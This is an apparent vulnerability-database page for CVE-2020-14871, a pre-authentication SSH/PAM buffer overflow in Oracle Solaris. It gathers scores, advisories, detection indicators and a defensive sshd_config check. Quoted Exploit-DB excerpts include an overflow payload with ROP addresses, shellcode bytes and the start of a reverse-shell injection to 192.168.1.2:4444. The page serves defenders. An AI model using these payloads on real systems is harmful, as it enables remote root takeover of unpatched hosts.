CVE-2020-14871
Published 2020-10-21
Priority P1 (98) · critical · CVSS 3.1 base score 10.0
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Tags: CISA KEV · Exploited in the wild · Public exploit · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-05-03
EPSS: 80.29% (99.6th percentile)
Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: This CVE is not exploitable for Solaris 11.1 and later releases, and ZFSSA 8.7 and later releases, thus the CVSS Base Score is 0.0. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | solaris | — | — |
| oracle | solaris | >= 10 < 11.1 | 11.1 |
| oracle_corporation | solaris_operating_system | — | — |
| oracle_corporation | solaris_operating_system | — | — |
Detection & IOCs (extracted from sources)
- bytes: `"A"*516 + \x04\x39\xbb\xfe\x19\xf8\xf0\x14\x01\x01\x04\x08\x07\xba\x05\x08\xd0\x56\xbb\xfe\xdf\x1e\xc2\xfe\x8c\x60\xfe\x56\xf1\xe3\xc3\xfe` (matches the payload prefix in the Exploit-DB (2) excerpt below)
- bytes: `\x31\xc0\x31\xc9\xbb\x01\x40\x04\x08\x66\xb8\x01\x40\xb1\x07\x4b\x48\x51\x50\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91` (mprotect stage-1 shellcode stub)
- Monitor sshd_config for ChallengeResponseAuthentication or KbdInteractiveAuthentication set to 'yes' on Oracle Solaris 10/11.0 hosts; these settings enable the attack vector.
- The exploit prompt string 'Please enter user name:' in SSH keyboard-interactive sessions is the trigger point; monitor for oversized responses to this specific prompt.
- Post-exploitation: look for unexpected bind shells on ports 9999, 8080, or 4444 on Solaris hosts, consistent with shellcode payloads embedded in public PoC exploits for this CVE.
- The Metasploit module for this CVE targets SunSSH 1.1.5 on Solaris 10u11 1/13 (x86); correlate exploit attempts against this specific version string in SSH banners.
- CVE-2020-14871 is NOT exploitable via SSH on Oracle Solaris 11.1 and later, because an unintentional change to the PAM library causes the username to be truncated before it reaches parse_user_name(). The vulnerability in the function itself still exists in those versions.
- ZFSSA 8.7 and later releases are also not exploitable; the NVD CVSS score is 0.0 for Solaris 11.1+ and ZFSSA 8.7+.
- ROP chain addresses in public exploits are environment-dependent; the sysenter gadget address (0xfebbbbf4) was found to differ between VMware on macOS vs. Windows hosts, meaning exploit reliability varies by hypervisor/host OS.
- The vulnerability may affect other PAM implementations beyond Solaris (e.g., illumos), as the flaw is in the shared PAM library parse_user_name() function.
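A defender-side triage check for the sshd_config setting named in the first detection bullet, as an added example that is not part of the page's sources or of any PoC. It assumes OpenSSH-style parsing semantics for SunSSH (first global value of a keyword wins, `Match` opens a conditional block) and runs against constructed sample configs.

```python
"""Exposure triage for CVE-2020-14871: does an sshd_config enable the
keyboard-interactive method the detection note above names?  Added example,
not part of any PoC or vendor tool. Assumes OpenSSH-style semantics (first
global value of a keyword wins; 'Match' opens a conditional block), which
SunSSH, an OpenSSH derivative, is assumed here to share."""
import re

# The two keywords the detection note lists, treated as aliases of one setting.
KBDINT_KEYS = ("challengeresponseauthentication", "kbdinteractiveauthentication")


def parse_directives(config_text):
    """Return (keyword, value, inside_match_block) triples in file order.
    Keywords are case-insensitive; 'Key value' and 'Key=value' both parse;
    blank lines and '#' comments are skipped."""
    out, in_match = [], False
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key, value = parts[0].lower(), (parts[1].strip().lower() if len(parts) > 1 else "")
        if key == "match":
            in_match = True  # later lines apply only to matching clients
            continue
        out.append((key, value, in_match))
    return out


def kbdint_exposure(config_text):
    """Classify as 'enabled', 'disabled', 'conditional' or 'unset'. 'unset'
    means the daemon's compiled-in default applies: verify it on the host."""
    global_val, match_yes = None, False
    for key, value, in_match in parse_directives(config_text):
        if key not in KBDINT_KEYS:
            continue
        if in_match:
            match_yes = match_yes or value == "yes"
        elif global_val is None:
            global_val = value  # first global occurrence wins
    if global_val == "yes":
        return "enabled"
    if match_yes:
        return "conditional"  # only for clients selected by a Match block
    return "unset" if global_val is None else "disabled"


# Constructed sample configs, not taken from any real host.
EXPOSED = "Port 22\nChallengeResponseAuthentication yes\nPasswordAuthentication no\n"
HARDENED = "# hardened\nChallengeResponseAuthentication no\nKbdInteractiveAuthentication=no\n"
PARTIAL = "ChallengeResponseAuthentication no\nMatch Address 10.0.0.0/8\n  ChallengeResponseAuthentication yes\n"
```

An 'unset' result is not a clean bill of health: the effective default has to be confirmed on the Solaris host itself.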
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 10.0 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 10.0 | CRITICAL | — |
| cisa | — | 10.0 | CRITICAL | — |
| vendor_oracle | — | 10.0 | CRITICAL | — |
GHSA
GHSA-7pcp-8fjh-246q: Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module)
ghsa_unreviewed · 2022-05-24 · CRITICAL · CWE-787
Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
VulnCheck
Oracle Solaris and Zettabyte File System (ZFS) Unspecified Vulnerability
vulncheck · 2020 · CVSS 10.0 · CRITICAL · CWE-787
Oracle Solaris and Oracle ZFS Storage Appliance Kit contain an unspecified vulnerability causing high impacts to confidentiality, integrity, and availability of affected systems.
Affected: Oracle Solaris and Zettabyte File System (ZFS)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.mandiant.com/resources/blog/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/471415817e60; https://vulncheck.com/xdb/5164fb652cf7
Remediation Due: 2022-05-03
CISA
Oracle Solaris and Zettabyte File System (ZFS) Unspecified Vulnerability
cisa · 2021-11-03 · CVSS 10.0 · CRITICAL · CWE-787
Affected: Oracle Solaris and Zettabyte File System (ZFS)
Oracle Solaris and Oracle ZFS Storage Appliance Kit contain an unspecified vulnerability causing high impacts to confidentiality, integrity, and availability of affected systems.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-14871
Remediation Due Date: 2022-05-03
Oracle
Oracle Systems Risk Matrix: Pluggable authentication module (CVE-2020-14871)
vendor_oracle · 2020-10-15 · CVSS 10.0 · CRITICAL
CVE: CVE-2020-14871
CVSS: 10.0
Protocol: Multiple
Remote exploit: Yes
Attack vector: Network
Advisory: cpuoct2020 (OCT 2020)
No detection rules found.
Exploit-DB
Solaris SunSSH 11.0 x86 - libpam Remote Root (3)
exploitdb · 2021-06-21 · CVSS 10.0 · CRITICAL
---
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (3)
# Exploit Author: Nathaniel Singer, Joe Rozner
# Date: 09/11/2020
# CVE: 2020-14871
# Vulnerable Version(s): Oracle Solaris: 9 (some releases), 10 (all releases), 11.0
# Description: CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6. The vulnerability received a CVSSv3 score of 10.0, the maximum possible score.
# Vendor Homepage: https://www.oracle.com/solaris
# Software Link: https://www.oracle.com/solaris/solaris10/downloads/solaris10-get-jsp-dow
Exploit-DB
Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
exploitdb · 2021-05-21 · CVSS 10.0 · CRITICAL
---
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
# Original Exploit Author: Hacker Fantastic
# Metasploit Module Author: wvu
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html
# Version: 10
# Tested on: SunOS solaris 10
# CVE: CVE-2020-14871
# Ported By: legend
import socket
import paramiko
from time import sleep
payload = b"A"*516+ b"\x04\x39\xbb\xfe" + b"\x19\xf8\xf0\x14" + b"\x01\x01\x04\x08" + b"\x07\xba\x05\x08" + b"\xd0\x56\xbb\xfe" + b"\xdf\x1e\xc2\xfe" + b"\x8c\x60\xfe\x56" + b"\xf1\xe3\xc3\xfe"
payload+=b"python${IFS}-c${IFS}\""
# msfvenom -p python/shell_reverse_tcp -b "\x00\x09\x20" LHOST=192.168.1.2 LPORT=4444
payload+=b"exec(__import__('base64').b64decode(__import__('
Exploit-DB
Solaris SunSSH 11.0 x86 - libpam Remote Root
exploitdb · 2020-12-15 · CVSS 10.0 · CRITICAL
---
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root
# Exploit Author: Hacker Fantastic
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html
# Version: 11
# Tested on: SunOS solaris 5.11 11.0
/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
* ====================================================================
* Makefile
* all: hfsunsshdx
*
* hfsunsshdx: main.c
* gcc main.c -o hfsunsshdx -lssh2
*
* clean:
* rm -rf hfsunsshdx
* rm -rf core.*
*
* A trivial to reach stack-based buffer overflow is present in libpam on
* Solaris. The vulnerable code exists in pam_framework.c parse_user_name()
* which allocates a fixed size buffer of 512 bytes on the stack and parses
* usernames
Metasploit
Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow
metasploit
This module exploits a stack-based buffer overflow in the Solaris PAM library's username parsing code, as used by the SunSSH daemon when the keyboard-interactive authentication method is specified. Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox, VMware Fusion, and VMware Player. Bare metal untested. Your addresses may vary.
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys · 2022-02-23
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Tenable
CVE-2020-14871: Critical Buffer Overflow in Oracle Solaris Exploited in the Wild as Zero-Day
blogs_tenable · 2020-11-05 · CVSS 10.0 · CRITICAL
References
- http://packetstormsecurity.com/files/159961/SunSSH-Solaris-10-x86-Remote-Root.html
- http://packetstormsecurity.com/files/160510/Solaris-SunSSH-11.0-x86-libpam-Remote-Root.html
- http://packetstormsecurity.com/files/160609/Oracle-Solaris-SunSSH-PAM-parse_user_name-Buffer-Overflow.html
- http://packetstormsecurity.com/files/163232/Solaris-SunSSH-11.0-Remote-Root.html
- http://www.openwall.com/lists/oss-security/2021/03/03/1
- http://www.openwall.com/lists/oss-security/2024/07/03/3
- https://www.oracle.com/security-alerts/cpuoct2020.html
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-14871
Timeline
- 2020-10-21: Published
- 2021-11-03: Added to CISA KEV
- Exploited in the wild